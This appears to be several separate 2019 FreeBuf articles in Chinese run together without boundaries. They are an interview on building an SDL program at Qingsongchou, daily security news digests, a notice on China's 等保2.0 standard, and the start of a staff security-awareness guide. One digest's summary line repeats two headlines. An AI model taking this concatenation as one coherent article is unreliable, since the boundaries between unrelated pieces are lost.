前言

很多甲方安全团队的工作都是从救火开始的,SDL很少会成为企业在进行安全建设时优先考虑的事项。“事前不用力、使不上力,事后补漏洞”可能是很多安全团队的写照,这种情况背后存在很多的原因,比如没有实现与DevOps交付模式的有机结合,SDL的门槛对于企业现状来说难以满足,SDL的推动跟不上业务模式的发展以及各种各样的历史遗留问题导致SDL落地难等等。

要实现SDL在企业内部的良好落地,要求的不仅仅是技术层面的体系化建设能力,面对不同实施对象、粒度粗细要求各异的业务,还需要超越技术层面的思维和协调能力,整个流程中有太多的事情是需要上下一心、横向对齐。市面上有很多讲如何企业SDL落地的书籍和文章,从架构设计到落地推动等等不一而足,讲得也比较透彻,但是对于真正从零开始推进SDL的安全负责人或安全团队而言,往往少了一些真实的案例和能够参考的抓手。

作为信息安全负责人,韩晋和团队里的小伙伴一起,从零开始在轻松筹内部推进SDL的落地,期间有一些曲折,也取得了很多成绩。本期安全大咖专访笔者连线韩晋,来解构一下他是如何以业务为导向,安全为基石,有重点有选择有顺序地推动SDL在轻松筹的落地。

韩晋其人

韩晋,中国科学院大学信息安全方向在读博士,现任轻松筹信息安全负责人,领导轻松筹安全团队从零搭建安全纵深架构,推动SDL在轻松筹的落地。曾担任Circle中国信息安全负责人、中国金融认证中心信息移动安全负责人、中兴通讯安全测试经理。拥有丰富的企业安全建设经验,是一名全栈安全工程师。

*全文为韩晋本人口述,FreeBuf仅做整理,无任何修饰或故事化,原味呈现最真实的企业安全人心声。

0×01 抓手

抓住最佳实践

SDL在国内企业的落地与推动过程中,或多或少都会碰到各种形态的阻力。我的总体思路是以业界的最佳实践为抓手,并在最佳实践落地时因地制宜把握好程度、优先级。

所谓最佳实践(Best Practice),是那些已经在别处产生显著效果并且能够适用于此处的优秀实践,包括已经产生的经验、教训、理论、流程、框架、方法论等内容。针对SDL的最佳实践,韩晋首推的是经过数十年验证的微软SDL。

微软在传统软件开发生命周期的基础上,从安全角度对各阶段增加了安全活动,包括培训、要求、设计、实施、验证、发布、响应几种,每种活动下也拆分为各种具体项目,比如在安全设计中,需要涵盖减小攻击面、深度防御、最小权限原则、安全默认设置等主题,而在实施过程中,需要涵盖使用批准的工具、不安全函数、避免溢出和SQL注入等主题,这些指导可以直接在微软官网下载。

以微软SDL为代表的业界最佳实践能够给与企业安全团队很有益的指导,但要注意的是,有了最佳实践指明方向后,企业安全负责人依然需要深入了解业务之后进行梳理:哪些是最佳实践没有涵盖的;哪些是中短期不用上马的,毕竟是他山之石,不能照搬。企业的业务重点不同,在落地过程中需要把握好程度和各阶段的优先级,对于安全的投入也要进行量化并考虑投资回报率。

韩晋在加入轻松筹后,优先解决了有无问题并设立了一些中短期目标,包括WAF、统一登陆系统、全链路审计、日志收集及处理、代码审计、EDR等,这些是未来推进DevSecOps的基础设施。他强调,考量业务侧对安全的需求很关键,业务侧最关心的安全问题基本直接与利润挂钩,所以可以考虑在SDL的落地中适当增加其优先级,解决这些问题对组织来说更能体现安全的价值。同时,在推进过程中肯定会有一些计划之外的阻力,所以需要进行周期性复盘,微调中短期目标,必要时可进行更换。在达到各个里程碑时,还可以进行宣传式的总结,让组织知晓当下阶段的工作价值,形成良性循环。

企业的安全负责人要根据公司的现状先上马贴合公司规模、现有业务最急需的模块,比如日志审计系统,有些企业可能连这个都还没上就急着做流量分析,这样先后顺序就不对。架构设计需要参照最佳实践指定的方向,基于公司自己的业务逻辑的侧重点,有先后地去落实,有时候会需要安全负责人针对最佳实践的理论定义做一些符合现实的改动。

以轻松筹为例,轻松筹是一家从事公益慈善、大病筹款、公众健康保障的互联网公司,数据会包含很多个人隐私信息,比如身份证号、病历、姓名和手机号等等,因此核心关注点是数据安全。这些数据会在轻松筹数据库上存在一定程度的中转,这种情况下,韩晋带领团队围绕着数据建立了相应安全功能机制的模块。

具体的做法是围绕着数据的传递展开,从东西向到南北向流量、数据流的每一个节点(比如用户在C端——APP或者微信H5,进行本地数据输入开始)保护数据的完整性、统一性和可用性,然后数据会通过网络传输到轻松筹的CDN,之后回源并经过WAF和SLB,经过SLB之后再经过中间服务器传输到后端的各个子业务。轻松筹的后端服务来处理任务,期间与数据库交互,还会传输到大数据部门进行二次的数据集成和混合计算。

期间数据经过的每一个节点,安全团队都会采用相应的安全措施来保证数据的安全三要素。所以从数据安全入手来推进SDL落地,是贴合轻松筹业务并取得突破的一个点。用一句话来概括,轻松筹安全团队围绕着数据传输,以保护用户个人隐私为核心,来推动SDL安全架构的落地。

采用开源工具

SDL工具是自行研发,还是基于开源或者收费软件进行二次开发,一者要看开源软件是否满足安全需求,二者取决于企业面临的安全需求是否迫切,哪种方式能迅速带来效益以解决目前的风险点。除此之外,商业现货能否在成本覆盖的情况下满足需求,以及对工具或平台的后期期望都是SDL架构设计和软件开发过程中要考虑的因素。

轻松筹是一家发展中的创业公司,基于开源软件二次开发是其首选的方式。假如经过通盘考虑之后开源和收费软件都无法满足需求,那么必须考虑自行研发了。但就目前而言,自行研发给轻松筹带来的人员成本很高,只能作为最后的选项。

有时候我们宁愿多花点时间等待开源软件的发展,密切关注它的下一个版本是否会引入我们所需的功能,然后跟进升级。

在谈到轻松筹SDL采用的工具时,韩晋如是说。SDL的推进、落地与企业的规模、市值呈一个直接的正比关系,一般而言投入多少精力、成本和资源就能够带来相应的成果。从现状出发,企业规模越大越会关注SDL整个流程是否完善,但是对于像轻松筹一样规模还较小的企业来说,如果一开始就投入很多资源来实现SDL全流程推进,这样的做法并不可取,业务与安全发生了本末倒置,这样一来安全也得不到发展。

可以说这样的指导思想是韩晋在实际工作中一以贯之的,其采用的现实策略确实给轻松筹带来了看得见的便利和成本节约,比如轻松筹采用的开源数据引擎Elasticsearch就是一个很好的例子。在推进SDL的过程中轻松筹部署了Elasticsearch,当时的6.4版本还没有满足流程所需的Index生命周期管理功能,员工还在使用脚本处理相关任务,十分不便,时间一长对于人力成本颇有影响。

我们考虑过自行开发一个交互操作友好、具备可视化UI界面的工具。后来发现Elasticsearch从6.6版开始,官方引入了该功能,且具备满足轻松筹当前所需的特性。当正式版释出后我们立刻将其整合到现有流程中进行测试,通过后就部署到生产环境中了。

这样的策略看似被动,实则对于大多数与轻松筹体量和发展阶段相似或者更小的企业而言,是符合成本考量的做法。企业在发展中的特定阶段和形势下,安全如果比业务跑得太快,有可能会变成反作用力,导致业务和收入的迟滞,甚至倒退。

0×02 推动和落地

开发与落地的难点

谈及SDL开发与落地过程中的难点时,韩晋表示SDL的落地在不同类型的企业中侧重点不同,比如金融企业面临着更高等级的监管要求,极端重视数据安全这一方面等。而轻松筹平台上有大量资金流动,但与大部分出售产品或服务的互联网公司不太一样:

我们主要是通过互联网化的方式搭建一个正能量的平台,在开发和运营的过程中大家的热情很高,这是我们的特点。

在这股巨大热情的推动下轻松筹发展非常快,也导致初期的流程和制度没有完善,这也是很多同类企业面临的问题:

1. 上线流程比较直接;

2. 除抗DDoS外无应用层防护;

3. 老旧业务没有及时下线;

4. 安全基线和代码审计没有部署等等。

轻松筹安全体系的建设基本是从零开始的,韩晋举了两个实例。

轻松筹的业务依托公有云开展,大量系统在云端,中间隔着公网,这种特点导致安全团队需要着重关注开发过程中的代码数据传输和访问的安全风险。对此,安全团队上线了代码管理平台https,增加公网IP白名单,确保只有轻松筹员工有权访问。这样引申出一个问题,如果员工想要移动或者异地办公,怎么办?那就上线VPN。部署VPN解决方案后发现了一些风险:是不是可以通过访客网络访问代码平台及其他系统?因为WI-FI输入密码即可进入,是否存在比较明显的风险让未授权设备进入内网,访问系统并进行内网渗透?

这样的担忧推动安全团队实施了统一登陆计划,建立了接入大多数系统的统一账号平台,所有系统账号的登录操作全都可以关联到一个人身上,确保每个链接和活动可控可溯源,在减小攻击面的同时为业务侧提供了便利,这也是推进SDL时带来的利好。

对中小企业,尤其是互联网和金融领域的企业来说,韩晋认为数据是核心,有利于提升安全的初始地位。未来云技术带来的安全效率和成本的改善会影响越来越多的企业上云,加速自动化和AI的融入。

另一个实例是内部网络中威胁情报分析和实体关系。由于历史原因,轻松筹后端服务在没有良好规范约束的前提下发展很快,导致服务之间的关系较为复杂,难以梳理,造成了安全部门部署防控策略时没有清晰的线索,比如不知道要关闭哪些业务端口,向开发团队咨询也得不到明确的答案。此外内部网络的流量关系分析也是关注的安全重点。

基于这两点,韩晋的安全团队提出了“两个环境”的方案:一个办公网环境,一个公有云环境。办公网使用流量旁路连接到一台抓包服务器,然后实时加密同步至Logstash集群再到ES, 公有云将重点服务器流量复制到ES,并使用在所有主机服务器部署Angent采集实体信息发送至ES,同时调用ES API实时查询威胁情报库进行威胁查询并离线存储,对流量数据进行建模,实体信息进行可视化关系展示。将这套方案投入到业务线运行一段时间后获得了良好的效果,业务也梳理地比较清晰。

这两个案例是韩晋在推动SDL开发过程中碰到的典型技术问题。他表示从整体流程看,推动起来比较有挑战性、成本比较高的还是沟通,这一点也是许多公司安全团队面临的挑战。

推动SDL的落地需要打通业务线的所有部门,获得他们的支持就显得尤为重要。客观上也会占用他们的一部分资源,这点难以避免,也是我们需要逐渐优化的部分。

打通业务线需要高级管理层的支持,但即便支持到位了,在业务急速发展的过程中,要让开发团队兼顾去做不在OKR列表中的工作也很考验技巧。韩晋的方法是确保SDL的落地与开发团队利益一致,让兄弟团队理解安全并不是站在敏捷开发的对立面,在DevOps过程中加入安全能力,能够形成三角支撑,更好地帮助业务顺利上线和开展。在某些安全与开发之间的问题难以调和时,安全团队可临时牺牲一些可控的安全措施,确保不会给业务带来太大阻力,在大方向上稳步推进。

向上教育与平行沟通

SDL属于典型的体系化建设,从上往下推可以起到事半功倍效果,但是,很多公司高管安全意识的现状不太乐观。

有一部分原因与安全部门的向上教育是否有效相关,导致国内企业的高管在信息安全方面大多都是事件驱动的。就当前大环境而言,韩晋认为要实现从高级管理层到安全团队、研发团队的全链条推进,安全的初始地位很重要

可以看到有一些公司的安全部门角色比较尴尬,有些团队把安全问题汇报给运维,有些汇报给风控,相对成熟一些的汇报给类似CTO的管理层人员,在较低的位置做向上教育会带来很高的成本。

针对这样的状况,韩晋的药方是什么?他认为努力让高管明白和理解安全工作的内涵以及价值,并且要保持一定的持续性。加入轻松筹后他制定了一系列计划并进行了实践,包括:

1. 成立风控管理委员会;

2. 定期做安全意识培训;

3. 针对热门安全事件进行分享;

4. 对公司业务的漏洞进行分析讲解;

5. 通过友好的安全模型解释安全现状及影响等等。

此外,韩晋还实现了安全与运维的统一管理,除开发测试环节基本不产生内耗。不过他强调这一点仅适用于轻松筹,企业的内部环境各异,不一定可复制。

如果高层支持到位了,工作会相对明朗一些。此外,这些举措对于研发团队也很适用,能否处理好安全团队与研发团队的关系,从推动SDL的全局角度来看至关重要。

推动研发团队的认可很多方面与做公司高级管理层的工作一样,从对于安全工作的认识出发,一是让研发团队了解安全团队在做什么,二是让他们知道这样做的重要性,从认识上达成一致,解决这一部分阻力之后剩下的基本是技术问题。

在沟通技术问题时,韩晋表示要考虑到研发团队成员的技术背景与工作强度,可借鉴“PDCA管理循环”的理念,采取较为直接的方式阐述技术问题,节约研发团队时间。他的经验是循序渐进,避免步子跨太大产生反效果,比如:

1. 直接向研发团队说明想要的结果;

2. 阐明过程中的技术问题,并提出自己的思路;

3. 对思路与过程进行讨论,对结果有个初步判断;

4. 达成初步一致后立刻进行实践。

由于轻松筹的业务务线较多,每个业务线推动的进程状态也不同,让韩晋欣慰的是公司高级管理层的有力支持下,有的业务线已经把安全问题纳入了考核,并且安全团队在全部上线流程上可以一票否决。

两个层面的策略

首先从管理层面看,管理策略直接决定了SDL和研发流程能否劲往一处使。

把安全意识融入到企业文化中是我们追求的目标,在这个过程中我对安全团队的要求是将“做能力范围内的事情”扩展到全公司,如果兄弟部门碰到问题且安全团队有能力解决,不论是否与安全相关都要尽量协助,在这个过程中可以加深相互的理解。在日常的安全宣传中,我们也会以培训、海报、不定期的安全测试、信息安全电子漫画的方式让大家逐渐明白和理解安全工作,但这些方法需要有足够的时间才能体现出价值。

在SDL推进过程中韩晋遇到的阻力可大致分为两种情况:

第一种是流程或机制太简单或者太繁琐,这种情况下需要当事团队间进行沟通,可先以达成简单目标作为过渡,然后为加强安全措施设定一个期限。

第二种是同事们表达方式太过直接导致在方案上没有达成一致的情况。这样的事件要拆开之后具体分析,如果责任划分上的事情不好区分,韩晋一般会主动承担,减少矛盾激化,但还是要坚持公平公正公开的原则,抓住以下几点进行突破:

1. 保持与公司业务目标一致

2. 做好向上教育

3. 跨部门沟通要维持良好状态

4. 安排好事情优先级

5. SDL过程中的角色分配至各个职能

技术角度来看,轻松筹还在逐步推进DevSecOps的落地,已经实现了多项功能和模块的自动化,包括白盒代码审计、各系统操作审计、主机扫描、线上业务状态监控、云端资产配置等。这些功能实现后客观上加快了一些上线流程,也能够让开发团队理解安全不会增加太多额外负担。除了自动化功能外,轻松筹还在黑盒测试上投入了一定的人力资源进行人工测试。

我更愿意将SDL中不同的关注点进行拆分,按需规划落实,具体哪个环节需要多资源,要根据企业业务规模和对安全的定位。同时,需要有一个具备专业知识和工程能力的人长期跟进,准确评估当前的紧急需要,将整体计划拆分下发分段完成,否则难以有效落地。针对重要模块还要提前准备Plan B,防止意外出现。

轻松筹发展速度很快,目前已有员工一千余名,业务和流程方面也在快速形成机制,在SDL的实践过程中韩晋也是将SDL所包含的内容拆分为可落地、可实现的多个模块来进行,进一步分解为目标清晰的事项来完成,而不是一开始就从很高的角度来谈SDL架构。

SDL在轻松筹的落地过程始终是一步一个脚印,韩晋告诉笔者一些基础设施的成功建立让他获得了很多成就感,比如主要系统纳入统一登陆管理之后,SDL覆盖到的系统都可以进行粒度细化到个人的、从办公网到生产网络的全链路审计。还有ELK集群搭建配置完毕后,实现了扫描结果、主机、流量、操作审计、威胁情报等各种行为数据的收集,并且构建了实时可视化及报警功能,还能作为机器学习的数据集进行建模分析等等。

SDL建设无法一蹴而就,整个过程中会遇到很多技术问题和取舍,原则是从用户和公司的利益角度出发,优先处理不可控的技术风险,先做好从0到1,再做从1到100。如果业务上线进程比较着急,来不及完成太多安全检测,这时可以评估风险暴露之后对用户和公司的影响,确保在可控范围内及时响应,并加强安全监控。

0×03 结语

SDL的推进与企业本身的动态变化息息相关,SDL不仅要切合现实顺应这些变化,而且要快。就现阶段而言,我们有很长的路要走,安全还不能比业务跑得太超前。未来我们会根据企业发展规模和安全资源朝着更细化的方向发展,降低小伙伴对安全的关注成本,最终做到安全意识变成习惯,安全机制无感知的目标。

互联网公司总是在跟时间竞速,跟同行业中的其他竞争对手赛跑,跑得快就能节省出更多时间成本去快速试错,调整方向沿着正确的轨道发展。这个过程中会有很多坎坷,韩晋也是带领着团队一步一步在摸索中前进。

*FreeBuf官方报道,未经许可禁止转载。

底图.gif

各位Buffer早上好,今天是 2019 年 5 月 17 日星期五。今天的早餐铺内容主要有:俄罗斯政府网站泄露225万用户护照和个人信息;Facebook未来20年将受美国政府隐私保护监督;美国联邦通信委员会计划为运营商提供更多权力来打击自动骚扰电话;微软终于推出Windows 10 Bug追踪页面;佛罗里达州州长:俄罗斯黑客在 2016 年入侵了该州的两个选民数据库。

Fully Loaded Breakfast Bagel-019.jpg

俄罗斯政府网站泄露225万用户护照和个人信息

多个俄罗斯政府网站泄露了超过225万公民、府雇员和政治家的个人和护照信息,任何人都可以下载。俄罗斯非政府组织Informational Culture的联合创始人Ivan Begtin发现并记录了泄漏事件。他调查了政府在线认证中心\50个政府门户网站以及政府机构使用的电子投标平台。其中有23个网站泄露个人保险账号(SNILS:俄罗斯相当于社会安全号码)和14个泄露护照信息的网站。

Begtin表示通过这些网站可以在线获得超过225万俄罗斯公民的数据,包括全名、职称和工作地点、电子邮件、税号、护照号等信息。虽然一部分泄漏数据难以识别并且需要从数字签名文件中提取元数据,但可以通过谷歌搜索政府网站上的开放网络目录找到一些数据。[来源:zdnet]

Facebook未来20年将受美国政府隐私保护监督

路透社援引消息人士的说法称,社交媒体巨头Facebook即将与美国政府就隐私保护政策和行为达成协议,从而在未来20年的时间里受到监督。此前,Facebook由于涉嫌违反2011年达成的类似协议而受到调查,新协议将解决这项调查。Facebook已经拨出30亿美元用于支付该公司预计中的30亿到50亿美元罚款,随后外界就猜测Facebook将与美国政府达成协议。不过两名消息人士周一表示,协议还不会在本周内达成。

其中一名消息人士说,宣布与联邦贸易委员会(FTC)达成和解可能还有一个月的时间。几名美国议员批评了FTC与Facebook可能达成协议的一些方面。这项协议将加强Facebook董事会对隐私政策和行为的监督,并要求Facebook更积极地监管第三方开发的应用。[来源:hackernews]

美国联邦通信委员会计划为运营商提供更多权力来打击自动骚扰电话

美国联邦通信委员会主席Ajit Pai希望为移动电话公司提供更大的权力来阻止不受欢迎的自动骚扰电话。这项提议如果获得通过,将允许无线运营商默认为客户阻止这些自动骚扰电话。公司还允许消费者自己阻止来自未知号码的呼叫。

Ajit Pai还建议就呼叫者身份验证标准寻求公众意见,这个标准框架将验证呼叫的来源,并允许更快地跟踪非法呼叫者,以找出谁对自动骚扰电话负责。周三晚些时候,Ajit Pai和其他四名FCC专员将在美国众议院专家小组就越来越多的自动骚扰电话问题作证。[来源:cnbeta]

微软终于推出Windows 10 Bug追踪页面

去年微软推出的 Windows 10 Version 1809 版出现文件丢失问题引起关注,而文件丢失问题其实在正式版推送前就已经有多名测试用户反馈但是微软并未及时处理,最终这个版本被微软撤回重新修复后再发布。这次事故微软也被不少业界专家批评不负责任和管理混乱,例如想查询已知问题需要依靠搜索引擎慢慢查找没有统一页面。

微软刚刚已经上线Windows 10运行状态仪表盘网站进行公测,据微软说明预计会在本月下旬正式推出网站。当前从测试版中我们可以看到微软会分别罗列各个版本的已知问题、已解决问题供用户查找问题和参考说明。同时也会在各个版本下标记当前状态,例如 Windows 10 Version 1809 版当前属于广泛推出状态可以更新。在导航栏顶部微软还提供Windows 10各个版本的生命周期列表,该页面详细记录各个版本的支持周期时间。[来源:cnbeta]

佛罗里达州州长:俄罗斯黑客在 2016 年入侵了该州的两个选民数据库

佛罗里达州州长Ron DeSantis在当地时间周二表示,俄罗斯黑客在2016年总统选举之前入侵了该州的两个选民数据库。根据DeSantis的说法,黑客能够通过向县雇员发送垃圾邮件来访问数据库。这些链接包含恶意软件,一旦打开,就会允许俄罗斯情报部门格勒乌(GRU)获得选民登记信息。

受影响县的名称未正式公布,但DeSantis表示已通知这些县的选举官员和雇员。《纽约时报》上个月月底报道称,在前特别顾问罗伯特·穆勒发布关于俄罗斯干涉2016年选举的报告后不久,这些恶意电子邮件被发送到佛罗里达州的120个选举电子邮件帐户。该报告此前证实,至少有一个县遭受了GRU的黑客攻击活动。根据穆勒的报告,“这些网络参与者至少可以改变或删除选民登记数据。”然而,DeSantis周二表示,黑客并没有操纵任何数据或选举结果。[来源:hackernews]

各位Buffer早上好,今天是 2019 年 5 月 10 日星期五。今天的早餐铺内容主要有:不安全的MongoDB数据库暴露了超过2.75亿条印度公民记录;过去三年中,Alpine Linux Docker镜像一直存在没有密码的root帐户;重庆网警:某医院未履行等级保护制度被罚款1万;Google 将推出新工具限制 cookie 跟踪;上市工业公司披露:子公司服务器突遭黑客攻击;Google 将推出新工具限制 cookie 跟踪;上市工业公司披露:子公司服务器突遭黑客攻击。

不安全的MongoDB数据库暴露了超过2.75亿条印度公民记录

安全发现研究员Bob Diachenko使用Shodan发现了在Amazon AWS上托管的可公开访问的MongoDB数据库,Shodan平台提供的历史数据显示,PII数据的大量缓存于2019年4月23日编入索引。暴露的数据包括姓名、性别、出生日期、电子邮件、手机号码、教育详情、专业信息(雇主、工作经历、技能、职能范围)和当前薪水等信息。

虽然本次MongoDB数据库泄露了数亿印度人的敏感信息,但Diachenko没有找到任何带有个人身份标识的信息。此外,存储在数据库中的数据集合名称表明,有人为了未知目的抓取了海量简历缓存。[来源:bleepingcomputer]

过去三年中,Alpine Linux Docker镜像一直存在没有密码的root帐户

思科的安全研究人员透露,在过去的三年半中,通过官方Docker Hub门户分发的Alpine Linux Docker镜像一直存在密码为空白(NULL)的root帐户。思科Talos在安全警报中表示,3.3版本之后的所有Alpine Linux Docker镜像都受到影响。

该问题于2015年8月首次发现,同年11月修补,然后在2015年12月意外重新开放三周后,今年1月才由思科伞研究员再次重新发现。该问题最初被认为只影响了Glider Labs Alpine Linux Docker图像,但后来发现它也影响了官方图像

重庆网警:某医院未履行等级保护制度被罚款1万元

近日,重庆永川某私立医院服务器突然陷入瘫痪,医院业务全面“停摆”,重庆永川公安接警后立即按照“净网2019”工作要求,启动网络安全应急响应预案,详细了解相关情况,在市公安局网安总队指导下,组织网安刑侦民警、勘验民警、管理民警、技术支持专家赶赴现场对该案件进行调查核实。经过民警和技术专家调查核实,该私立医院因未按照网络安全等级保护制度的要求履行安全保护义务。

医院HIS、LIS、PACS、EMR等后台系统业务以及微信公众号后台、医院网站等主要系统业务全部放置在同一套服务器中,医院未安装边界防护设备、未安装日志行为审计设备,未设置数据安全备份策略等其他网络安全技术措施,使医院业务在互联网上长期处于“裸奔”状态。黑客通过互联网攻破医院系统后植入勒索病毒,导致医院业务全面“停摆”。

针对此案,公安部门按照公安部“一案双查”工作要求,对医院未按照网络安全等级保护制度的要求履行安全保护义务的行为进行查处,并按照《中华人民共和国网络安全法》第五十九条之规定,对医院处以罚款一万元,对直接负责的主管人员处以罚款五千元的行政处罚。[来源:重庆网警]

Google 将推出新工具限制 cookie 跟踪

Google 将在其 Chrome 浏览器上推出新工具,让用户在避免 cookie 追踪方面拥有更多控制权。Google 的新工具预计不会严重削弱 Cookie 收集数据的能力,但可能帮助 Google 扩大领先于在线广告竞争对手的巨大优势。根据 eMarketer 数据,Google 拥有 30 亿用户,助其成为全球最大互联网广告销售商,将这个市场营收总额的近三分之一收入囊中,领先于 Facebook 的 20%。新工具主要针对牟利的第三方所安装的 cookie,而不是用户主动浏览网站的。[来源:solidot]

上市工业公司披露:子公司服务器突遭黑客攻击

据深交所网站5月8日晚间披露,东方精工公告称,旗下子公司北京普莱德新能源电池科技有限公司北京和溧阳的服务器突遭黑客攻击,目前情况未知。东方精工已第一时间发函要求普莱德管理层详细了解黑客攻击的情况(包括文件丢失或损毁的范围和程度),并向东方精工报告。同时,东方精工还要求普莱德评估对其日常业务经营和管理的影响,督促普莱德管理层采取有效措施,保障普莱德的网络信息安全。

据悉,东方精工是国内最早从事瓦楞纸箱多色印刷成套设备生产企业之一,也是最早获得欧盟CE认证的国内瓦楞纸箱印刷机械制造商之一,产品远销欧美、东南亚及印度等三十多个国家和地区。普莱德则从事新能源汽车电池行业,主要研发和生产新能源汽车动力锂离子电池系统和电池管理系统,为客户提供电池系统集成解决方案。[来源:安全内参]

 

2019年5月13日下午,国家市场监督管理总局召开新闻发布会,期待已久的等保2.0正式发布。根据最新的消息,等保2.0将在2019年12月1日正式实施。

“等保1.0”的时代于2008年正式拉开帷幕,经过10余年的实践,为保障我国信息安全打下了坚实的基础,但从现实考量已经逐渐开始不适应网络环境的变化。为适应新技术的发展,解决云计算、物联网、移动互联和工控领域信息系统的等级保护工作的需要,由公安部牵头组织开展了信息技术新领域等级保护重点标准申报国家标准的工作,等级保护正式进入2.0时代。我们预计,等保2.0标准即将正式发布,整个信息安全行业需求将在2019年迎来重要的边际改善。

中国工程院院士沈昌祥表示:

等级保护由1.0 到2.0是被动防御变成主动防御的变化,依照等级保护制度可以做到整体防御、分区隔离;积极防护、内外兼防;自身防御、主动免疫;纵深防御、技管并重。

“等保2.0”在技术标准上,云计算、大数据等技术列入新标准体系。据中国公安部官员介绍,下周一发布的2.0版本将针对新技术提出扩展性要求,在聚焦于等级保护的基本要求时,更多用技术思维解读标准。

中国的网络安全等级保护技术1.0版本主要强调物理主机、应用、数据、传输,2.0版本将在云计算、大数据、物联网、工业控制系统等新技术新应用方面有涉及。

从等保1.0到等保2.0,变化体现在多个方面,差异主要体现在:

(1) 体系框架和保障思路的变化

(2) 定级对象的变化

(3)测评的变化

(4) 等保要求的组合变化

(5)控制点和要求项的变化

“等保2.0″不仅增加了大量重要要求项, 也将彻底改变我国信息安全市场的面貌。


2019年5月13日下午更新


2019年5月13日下午,国家市场监督管理总局召开新闻发布会,期待已久的等保2.0正式发布。根据最新的消息,等保2.0将在2019年12月1日正式实施。

WechatIMG657.jpeg

“等保2.0”的落地近在眼前,你准备好了吗?

一直以来FreeBuf都在密切关注“等保2.0”的进程,特地推出了“等保2.0”专题系列,包含对“等保2.0”的各部分的详细解读于新旧规定的对比等干货内容。

这里或从FreeBuf主站右侧进入“等保2.0”专题版块,帮助你快速查漏补缺~

*参考来源:界面新闻,Freddy编辑整理,转载请注明来源。

各位Buffer早上好,今天是 2019 年 5 月 6 日星期一。今天的早餐铺内容主要有:几大 Git 平台仓库被劫,黑客欲勒索比特币;黑客窃取美国和加拿大201家校园在线商店的数据;安全专家轻松接管29个僵尸网络,只因黑客太菜;国家互联网应急中心开通勒索病毒免费查询服务;Firefox火狐浏览器已推送“插件失效”证书修复补丁。

几大 Git 平台仓库被劫,黑客欲勒索比特币

数百名开发人员的 Git 仓库被黑客删除,取而代之的是赎金要求。攻击于5月3日开始,包括 GitHub、Bitbucket 和 GitLab在内的代码托管平台都受到了影响。 目前已知的情况是,黑客从受害者的 Git 仓库中删除了所有源代码和最近提交的 Repo,只留下了 0.1 比特币(约 ¥3850)的赎金票据。黑客声称所有源码都已经下载并存储在他们的一台服务器上,并且给受害者十天时间支付赎金,否则,他们会公开代码。

在 GitHub 上搜索可发现已有 391 个仓库受影响,这些仓库的代码和提交信息均被一个名为 “gitbackup” 的账号删除。尽管如此,BitcoinAbuse 平台显示,该比特币地址目前还未收到赎金。[来源:securityaffairs]

黑客窃取美国和加拿大201家校园在线商店的数据

趋势科技在周五发布的一份报告中称,位于美国和加拿大的201家校园网上商店发现恶意代码,这些商店为美国176所大学和21所加拿大大学提供服务。安全研究人员称之为Magecart攻击,黑客将恶意JavaScript代码植入在线商店的结账和支付页面以记录支付卡数据,然后将其上传到服务器,并在地下网络黑市上出售。[来源:zdnet]

安全专家轻松接管29个僵尸网络,只因黑客太菜

安全专家一次性接管了 29 个僵尸网络,原理十分简单,利用了黑客技术“太菜”的弱点。在采访中,安全专家Subby介绍了他接管的这 29 个僵尸网络,他指出其实这些僵尸网络都比较小,最初的机器人数量显示总计将近 40000,但在删除重复数据后,实际数量仅为 25000,这样的数据对于一个单独的 IoT僵尸网络来说都是很小的,更不用说是 29 个的总和了。

谈到为什么能一次性轻易黑掉 29 个僵尸网络,Subby 解释一些僵尸网络运营商经常使用比较弱的凭证来保护其 C&C服务器后端。Subby 使用了一个用户名词典和一个常用密码列表对这些僵尸网络的 C&C 基础设施进行暴力破解,收获非常多。这其中,有一些设备使用了非常弱的用户与密码组合,如`root:root`、`admin:admin`和`oof:oof`。[来源:zdnet]

国家互联网应急中心开通勒索病毒免费查询服务

从国家互联网应急中心获悉,为了有效控制WannaCry勒索病毒的传播感染,国家互联网应急中心近日开通了该病毒感染数据免费查询服务。2017年5月12日,WannaCry勒索病毒利用Windows SMB(“永恒之蓝”)漏洞在全球快速传播,造成全球计算机大范围感染。

据悉,截至2019年4月9日,国家互联网应急中心监测发现我国境内疑似感染WannaCry勒索病毒的计算机数量超过30万台,仍有大量的计算机未安装“永恒之蓝”漏洞补丁和杀毒软件。我国计算机感染WannaCry勒索病毒疫情依然比较严峻。为了有效控制WannaCry勒索病毒的传播感染,国家互联网应急中心开通了该病毒感染数据免费查询服务。查询说明如下:

1、WannaCry勒索病毒暂只能感染Windows操作系统,请用户在Windows操作系统上的浏览器中输入查询地址打开查询页面进行查询,查询地址为:http://wanna-check.cert.org.cn

2、若提示IP地址承载的计算机受到感染,建议使用WannaCry勒索病毒专杀工具进行查杀,并及时修复相关漏洞。

3、如果使用宽带拨号上网或手机上网,由于IP地址经常变化,会导致查询结果不准确,仅供参考。[来源:cnbeta]

Firefox火狐浏览器已推送“插件失效”证书修复补丁

由于Mozilla公司忘记更新用于签署Firefox插件的安全证书,当证书过期,导致新的插件下载安装失败,并阻止现有的插件正常工作。Mozilla现在宣布他们推出了一个修复程序,并表示:我们的团队已经确定并推出了针对Release、Beta和Nightly的所有Firefox浏览器桌面用户的修复程序。修复程序将在接下来的几个小时内自动应用于后台。不需要采取任何有效步骤来使插件再次起作用。

大多数用户不需要采取任何行动,但如果你已禁用Studies,这是Mozilla用于对新功能进行A/B测试的功能,则需要重新启用它。[来源:IT之家]

前言

很多企业安全部门可能因为将预算和资源都投入到软/硬件安全解决方案的采购与部署,侧重技防,而选择性忽略或者根本没有更多预算投入人防。实际上人防与技防处于同等重要的位置,基于技术的解决方案能够覆盖的领域是有限的,即使企业花了很多钱来构建安全防线,有时候一个来自内部人员的小错误就可能将企业置于岌岌可危的境地。

从攻击端来看,攻击者越来越重视终端用户的行为心理研究,不断通过各种方法绕过企业的安全防御策略来达到目的,水坑式攻击和鱼叉式钓鱼攻击是两种典型的方式。

要建好“人民防线”,离不开良好的人员操作机制和安全意识提升计划。通过制定周密的安全意识提升项目,员工能够主动担负起责任,更好地保护企业数字资产和识产权。此外,从更高的角度来看,员工还能将所学的安全知识延伸到个人生活中,使得更多的家庭受益。

2016年,Gartner曾发布了一篇安全指南,提出了一些帮助中小型企业在预算十分紧张的情况下提升员工安全意识的建议。三年过去了,网络空间的形态发生了很多变化,因此Gartner的安全专家重写了这篇指南,提出了几种简单可行、立竿见影的方法,仍坚持“调动最少的资源”这一原则。

most-Popular-employee-perks.jpg

方法一、简单明了的消息通知

内网横幅

采用网络广告的思路在企业内部网页顶端添加横幅,推进安全意识的树立和安全消息的传达能力。

登录消息

